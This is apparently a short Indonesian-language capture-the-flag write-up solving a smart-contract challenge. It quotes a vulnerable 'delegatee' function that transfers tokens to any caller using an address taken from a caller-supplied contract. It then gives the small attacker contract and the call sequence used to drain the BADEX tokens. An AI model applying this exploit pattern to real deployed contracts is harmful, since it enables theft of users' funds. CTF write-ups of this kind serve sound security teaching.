sysfixed.org/ctf #1
MRF
0x8544
February 13th, 2023

maaf kalo acak-acakan singkatnya..
awal lihat holder ada 2 contract yg berisi token badex, (BUG) 0x391a6cedbc9e91f66187ff562b29b954d8bd3288 dan (ASU) *0x61cf470fc4037523487e94959095fdb66fd19f10

*si kontrak ASU ternyata unverified, setelah didecompile ternyata zonk.
kontrak BUG verified dan bisa lihat full source codenya.

Piye Yo Carane?

yg pertama saya cari itu function external, dan nemu yg agak janggal dari namanya "delegatee"
function delegatee ini manggil kontrak lain buat dapetin address token yg mau ditransfer.

function delegatee(address token_, uint256 amount_) external override {
// token_ itu pengalihan nama aja, anggep aja contractB
address tokenAddress = IERC20(token_).getAddress();
// lihat value function getAddress() di contractB
require(tokenAddress != address(this));
// gabisa sama kyk address ini, jadi perlu buat contractB
IERC20(tokenAddress).transfer(msg.sender, amount_);
// kirim token badexnya
}

kedua deploy contractB ini buat pancingan delegatee()

contract Test {
function getAddress() public view returns(address){
return 0x0C8aC4d5B1E6717d7FD0476DC84249F8De6a54Ea;
// ini address token badex
}
}

setelah deploy dapet address contract yg baru dideploy tuh, langsung gas panggil delegatee nya.
contoh hasil deploy: 0xd5FFF4723f57E2561a2E0ffA0c5979623fEec434

manggil delegatee
manggil delegatee
Subscribe to MRF
Receive the latest updates directly to your inbox.
Mint this entry as an NFT to add it to your collection.
Verification
This entry has been permanently stored onchain and signed by its creator.
Arweave Transaction
YcwRa0J82KoluF6…T8-ZZZJUJydN-G0
Author Address
0x85448C1B648bd52…069cE59e1533BBB
Content Digest
5BPFoGJSmTfBJeu…cXHbB0r6Y2Ej-QA